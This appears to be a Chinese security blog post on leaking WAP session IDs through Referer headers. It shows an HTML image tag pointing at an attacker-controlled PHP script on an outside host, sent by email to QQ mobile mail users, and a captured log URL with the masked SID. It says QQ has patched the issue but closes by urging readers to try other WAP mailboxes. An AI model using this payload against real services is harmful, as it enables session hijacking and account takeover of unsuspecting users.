利用图片钓WAP网站SID

By   空虚浪子心    http://inbreak.net  http://t.qq.com/javasecurity

《浅谈WAP网站安全》文章中,一直都是保守起见,希望可以抛砖引玉,但是没有啥响应,只好自己拿出来点东西了。本片介绍在我们能插入富文本的地方,获取SID的终极方式。

《浅谈WAP网站安全》文中有以下几点:

友情链接安全问题

用户互动导致SID泄露

UCWEB浏览器自动生成链接功能引起的SID泄露

QQ浏览器自动预读功能引起的SID泄露

可以从顺序看到,攻击从“用户必须手工点一下”到“用户只要看了,就被攻击”,这其实是个漏洞可利用度提升的过程。最最贴心的攻击,就是最后那个,用户体验会很好,但是必须使用特殊的浏览器才行。

从漏洞利用角度,还是有很多东西的,这篇先提一点,图片的src也会自动发referer。

我们还是拿QQ做例子,QQ的手机邮箱,发个邮件给它,我测试,必须使用其他邮箱(比如163)发送邮件才可以。

邮件内容只要有张图片,内容为:

<img src="http://inbreak.net/logo.php">

当手机用户打开QQ邮箱后,查看邮件:

左下角有个图片,但是看不到图片内容。

其实图片是假的,是个php,你可以在php文件中获取referer,如果要做的像一点,最好在获取referer后,真的生成一张图片出来。下面是作者从IIS日志中抓到的内容:

http://w34.mail.qq.com/cgi-bin/readmail?sid=XXXXX,4,WWWWWW.&disptype=html&mailid=fdsafdsafdsafdsafdsa_dSaO775lQ12&t=&conv=&p=&cmid=

只有让浏览器在打开页面的同时,自动发个get出去,才是最快捷的方式。

QQ目前已经修补了这个漏洞

由于这个漏洞,对无线wap应用打击太大,所以很长时间没拿出来。在作者的blog中,已经把WAP安全的相关内容,都作为了一个分类,便于查找。

http://inbreak.net/archives/category/%E5%8E%9F%E5%88%9B%E6%96%87%E7%AB%A0/wap-security

现在,大家可以去遍历各大无线WAP邮箱了。

 

发表评论?

0 条评论。

发表评论